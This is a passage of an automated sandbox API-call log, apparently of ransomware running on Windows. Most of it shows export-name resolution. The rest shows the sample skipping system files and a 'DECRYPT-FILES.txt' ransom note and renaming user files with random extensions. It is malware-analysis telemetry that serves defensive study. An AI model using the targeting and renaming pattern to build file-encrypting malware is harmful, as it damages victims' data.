lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.662] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.662] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.662] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.662] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.662] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.662] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.662] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.662] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.662] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.662] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.662] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.662] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.662] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.662] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.662] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.662] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.662] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.662] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.663] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.663] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.663] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.663] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.663] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.663] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.663] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.663] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.663] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.663] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.663] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.663] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.663] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.663] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.663] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.663] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.663] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.663] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.663] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.664] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.664] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.664] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.664] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.664] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.664] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.664] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.664] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.664] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.664] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.664] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.664] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.664] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.664] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.664] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.664] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.664] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.664] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.664] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.665] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.665] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.665] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.665] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.665] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.665] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.665] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.665] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.665] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.665] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.665] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.665] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.665] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.665] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.665] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.665] lstrlenA (lpString="DELETEATOM") returned 10 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.665] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.665] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.666] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.666] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.666] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.666] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.666] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.666] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.666] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.666] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.666] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.666] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.666] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.666] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.666] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.666] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.666] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.666] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.666] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.666] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.666] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.667] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.667] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.667] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.667] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.667] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.667] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.667] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.667] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.667] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.667] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.667] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.667] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.667] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.667] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.667] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.667] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.667] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.667] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.667] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.668] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.668] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.668] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.668] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.668] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.668] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.668] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b") returned 73 [0185.668] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b.pbbfTq") returned 80 [0185.668] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.bhg1b"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b.pbbfTq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.bhg1b.pbbftq"), dwFlags=0x0) returned 1 [0185.669] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.669] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.669] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.669] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef2db20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url.0L2uJ", cAlternateFileName="MSNURL~1.0L2")) returned 1 [0185.669] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="DECRYPT-FILES.txt") returned 1 [0185.669] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="autorun.inf") returned 1 [0185.669] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="boot.ini") returned 1 [0185.669] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="desktop.ini") returned 1 [0185.669] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="ntuser.dat") returned -1 [0185.669] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="iconcache.db") returned 1 [0185.670] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="bootsect.bak") returned 1 [0185.670] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="ntuser.dat.log") returned -1 [0185.670] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="thumbs.db") returned -1 [0185.670] lstrcmpiW (lpString1="MSN.url.0L2uJ", lpString2="Bootfont.bin") returned 1 [0185.670] lstrlenW (lpString="MSN.url.0L2uJ") returned 13 [0185.670] lstrcmpiW (lpString1="0L2uJ", lpString2="lnk") returned -1 [0185.670] lstrcmpiW (lpString1="0L2uJ", lpString2="exe") returned -1 [0185.670] lstrcmpiW (lpString1="0L2uJ", lpString2="sys") returned -1 [0185.670] lstrcmpiW (lpString1="0L2uJ", lpString2="dll") returned -1 [0185.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.670] lstrlenW (lpString="MSN.url.0L2uJ") returned 13 [0185.670] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.670] lstrcatW 